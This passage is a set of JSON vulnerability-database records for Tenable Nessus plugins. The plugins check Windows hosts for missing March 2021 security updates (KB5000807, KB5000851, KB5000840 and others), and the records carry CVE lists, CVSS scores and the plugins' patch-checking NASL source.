{"lastseen": "2022-05-13T15:03:27", "description": "The remote Windows host is missing security update 5000807.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26866, CVE-2021-26868, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26885, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26881)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000807: Windows 10 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27077"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000807.NASL", "href": "https://www.tenable.com/plugins/nessus/147230", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147230);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000807\");\n script_xref(name:\"MSFT\", value:\"MS21-5000807\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000807: Windows 10 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000807.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26871, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26885, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26881)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000807-os-build-10240-18874-09c57376-4108-4d34-bc89-3d4baec37ade\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dcda9069\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000807.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26901\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000807'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000807])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T20:36:51", "description": "The remote Windows host is missing security update 5000851 or cumulative update 5000841. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26896, CVE-2021-27063)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000851: Windows 7 and Windows Server 2008 R2 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000841.NASL", "href": "https://www.tenable.com/plugins/nessus/147231", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147231);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000841\");\n script_xref(name:\"MSFT\", value:\"MS21-5000841\");\n script_xref(name:\"MSKB\", value:\"5000851\");\n script_xref(name:\"MSFT\", value:\"MS21-5000851\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000851: Windows 7 and Windows Server 2008 R2 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000851\nor cumulative update 5000841. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26882, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26896,\n CVE-2021-27063)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000851-security-only-update-9e198918-a6d6-46d3-8cfb-bd2b1e2ecb99\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cce9359\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000841-monthly-rollup-3a2cced1-f436-40c3-a8a1-645f86759088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c5851d4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000851 or Cumulative Update KB5000841.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000841',\n '5000851'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000841, 5000851])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T20:31:37", "description": "The remote Windows host is missing security update 5000840 or cumulative update 5000847. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000840: Windows Server 2012 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000847.NASL", "href": "https://www.tenable.com/plugins/nessus/147221", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147221);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\"\n );\n script_xref(name:\"MSKB\", value:\"5000847\");\n script_xref(name:\"MSKB\", value:\"5000840\");\n script_xref(name:\"MSFT\", value:\"MS21-5000847\");\n script_xref(name:\"MSFT\", value:\"MS21-5000840\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000840: Windows Server 2012 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000840\nor cumulative update 5000847. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26886,\n CVE-2021-26896, CVE-2021-27063)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26882, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000847-monthly-rollup-8afa2933-e9da-4481-a0bc-18deb314974e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df958afd\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000840-security-only-update-a5261347-8a42-4727-a544-bd66fb3d4d70\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2561ac2c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000840 or Cumulative Update KB5000847.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000847',\n '5000840'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000847, 5000840])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T20:35:25", "description": "The remote Windows host is missing security update 5000853 or cumulative update 5000848. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000853: Windows 8.1 and Windows Server 2012 R2 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000848.NASL", "href": "https://www.tenable.com/plugins/nessus/147229", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147229);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000848\");\n script_xref(name:\"MSFT\", value:\"MS21-5000848\");\n script_xref(name:\"MSKB\", value:\"5000853\");\n script_xref(name:\"MSFT\", value:\"MS21-5000853\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000853: Windows 8.1 and Windows Server 2012 R2 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000853\nor cumulative update 5000848. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. 